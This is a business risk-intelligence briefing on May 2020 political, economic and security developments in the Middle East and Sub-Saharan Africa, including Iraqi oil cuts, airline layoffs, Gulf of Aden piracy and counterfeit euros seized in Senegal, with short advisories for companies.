Iraq's government has agreed with international oil majors operating in five large southern fields that they will cut their output by 300,000 barrels per day (bpd), according to a report in Reuters on 13 May. Baghdad will reduce its oil production in other fields by another 400,000 bpd. Officials were unable to reach agreement on a larger cut, highlighting how little leverage Baghdad has over foreign oil companies operating within its borders. A senior official at Iraq's Basra Oil Company (BOC) said that the cut of around 300,000 bpd is considered nominal. Foreign companies should monitor the situation and factor the potential for further cuts into strategic planning.

Flag carrier Qatar Airways said on 13 May that it will lay off nearly 20 per cent of its workforce due to the impact of the COVID-19 pandemic on global travel demand. The carrier's chief executive officer, Akbar Al Baker, said rehiring affected employees would be the first priority once business returns to full capacity. According to IATA figures, Qatar has seen 8 million fewer passengers in recent months, resulting in a USD1.7 billion revenue loss, and risking 70,000 jobs and USD2.8 billion in contribution to government revenue. Qatar Airways is a major carrier in the region, employing nearly 47,000 people worldwide. Companies partnering with Qatar Airways and other regional airlines should engage with stakeholders to ascertain the impact of the situation on staffing, operations, and strategy.

French energy company Total said on 18 May that its planned purchase of assets in Algeria and Ghana from US company Occidental Petroleum (Oxy) had fallen through after the Algerian government rejected the deal there. The acquisition of oil and gas assets in Algeria was part of a USD8.8 billion deal reached by the companies on the African assets of Anadarko Petroleum, which was bought by Oxy in 2019. Algeria's government objected to the deal, and the energy ministry said on 6 May that the country would maintain Anadarko's contract with state oil company Sonatrach, with Oxy continuing investment in the country.

Algeria’s new hydrocarbon law, designed to reverse declining foreign upstream investment through improved contract terms and tax rates, came into force in early January. The law is aimed at making investment in its oil and gas industry more attractive to foreign companies and bolstering Algeria’s energy production amid falling oil and gas revenue. However, the government has expressed opposition to the Total deal for months. The deal has also been a source of agitation for anti-government protesters who rallied throughout much of 2019. Companies with oil and gas operations in Algeria should monitor the situation and factor the development into strategic and operational planning.

Prime Minister Hassan Diab said that Lebanon would begin to gradually re-open the economy from 18 May. During a televised speech on Sunday, Diab also warned the Lebanese public to strictly adhere to health and safety guidelines, including the social distancing that had been flouted during a previous attempt at re-opening. Factories, wholesale markets and distribution warehouses, stores, and hotels are allowed to re-open. Reduced working hours will be required in many cases, including for restaurants and cafes, which will be allowed to open from 0500 to 1900. These will also operate at only 50 per cent capacity and will not serve shisha (water pipe). Meanwhile, anti-government protests are continuing and are likely to do so. Security managers should monitor the situation and plan for increased security measures in the vicinity of protests.

The main warring parties in Syria have agreed to resume talks in Geneva aimed at achieving lasting peace for the country, according to the UN special envoy for Syria, Geir Pedersen, on Tuesday (19 May). Pedersen said in a UN video press briefing that talks will take place as soon as the COVID-19 pandemic allows, although no agenda for the next meeting has been agreed. Pedersen also said a virtual meeting would not be possible. Local media reports over the past two weeks state that Syrian army troop movements suggest preparations for a military campaign to unilaterally retake the M4 highway may be under way, with speculation that this could occur after the Eid al-Fitr holiday on 23 and 24 May, which marks the end of the holy month of Ramadan. Any such activity would present a major spoiler for future peace talks, though a restraining factor will be Russia's desire to preserve good relations with Turkey amid its stated goal of finding a political solution to the conflict.

A British-flagged chemical tanker was attacked by armed pirates in the Gulf of Aden on 17 May. Six pirates reportedly approached the STOLT APAL in two speedboats, some 139km off the port city of Mukalla, at around 1530 local time. None of the ship's cargo was damaged. The United Kingdom Maritime Trade Operations (UKMTO) confirmed the attack on 17 May and advised extreme caution to any vessels transiting the area. It was the ninth reported attack in the Gulf of Aden this year. There is also concern that piracy, which used to be concentrated around the coast of Somalia, is now moving toward the strategic Bab el-Mandeb strait amid an uptick in suspicious incidents compared with 2019.

Sub-Saharan Africa

UK-registered oil company Tullow Oil on 15 May declared force majeure on its development licences for blocks 10BB and 13T in the South Lokichar basin in Kenya, according to several local news reports. This is due to a serious drop in demand caused by the oil-price war between Russia, Saudi Arabia, and the US, and by travel restrictions imposed to slow the spread of COVID-19. The declaration will likely delay Tullow's final investment decision for the project, which it had expected to sign by the end of this year, signalling a further delay in bringing the project online. In parallel, the company is facing continued setbacks at its other investments in Ghana and Uganda, where growing local opposition could put a brake on development plans.

Nigerian Minister of Aviation Hadi Sirika said on 17 May that authorities had impounded an aircraft operated by a UK-based airline called Flair Aviation. In a tweet, he accused the company of operating a commercial flight to the country in violation of a ban on international flights that will remain in effect until at least 4 June. There is no UK-based company of that name; however, there are companies with that name registered in Canada and Germany. According to an aviation ministry spokesperson who spoke to Reuters on 17 May, the company is based in the UK but is called FlairJet and is a franchise of US-based airline FlexJet. Corporate communications departments of the named companies should take steps to clarify the messaging in international broadcast media to mitigate the risk of serious reputational damage during the COVID-19 pandemic. More broadly, compliance officers at airlines and related logistics operators covered by exemptions for humanitarian or essential needs during the COVID-19 pandemic should step up their monitoring of government responses, and their internal communication of them, to ensure compliance throughout the company's global operations.

South African state-owned power utility Eskom is in informal discussions with the World Bank Group to change the terms of a USD3.5 billion loan in order to avoid having to spend money to cut sulphur oxide emissions from one of its largest power plants. Eskom confirmed that discussions are ongoing but that no formal decision has been taken. Even without a formal decision, the report underscores the country's dire economic outlook, which points to a significant downturn over the coming year. Several of the country's many state-owned enterprises, including Eskom and airlines such as South African Airways and SA Express, are highly indebted and are struggling to service their obligations.

Senegalese media reported on 19 May that police had seized EUR1.92 billion worth of fake bank notes, denominated in euros, and arrested several suspects in the Mbao area of Pikine, the country's second-largest city, located about 25km east of central Dakar. Media reports also allege that the fraud scheme was orchestrated by an extensive criminal network, including several former high-ranking officials. The seizure is likely to lead to money-laundering and fraud prosecutions of some of those arrested. The case also underscores the risk of fraud to businesses with operations in Senegal, which is a cash-based economy. The sheer volume of cash seized also suggests that large quantities of counterfeit euro-denominated bank notes may be in circulation across the country, exposing staff and companies to security risks. Companies that handle large amounts of cash should review their internal processes for spotting fake bank notes and ensure that all staff, in particular frontline workers who handle cash, are aware of the latest techniques used by bank note counterfeiters.

Madagascar's central bank, Banky Foiben'i Madagasikara (BFM), announced on 20 May that it has temporarily suspended foreign exchange operations in the capital Antananarivo, as well as in the cities of Toamasina, Fianarantsoa, and Ambatondrazaka. This is to ensure currency traders can respect the government's recommendations for physical distancing to slow the spread of COVID-19 in-country. All the affected cities are located in regions that are currently under strict travel restrictions and curfews. While the BFM did not say when it anticipates operations resuming, the suspension is likely to remain in place for as long as the lockdowns of the Analamanga, Atsinanana and Haute Matsiatra regions remain in place. Managers should conduct online transactions where practical and inform their clients and service providers about the interrupted service to mitigate the risk of penalties and other additional fees.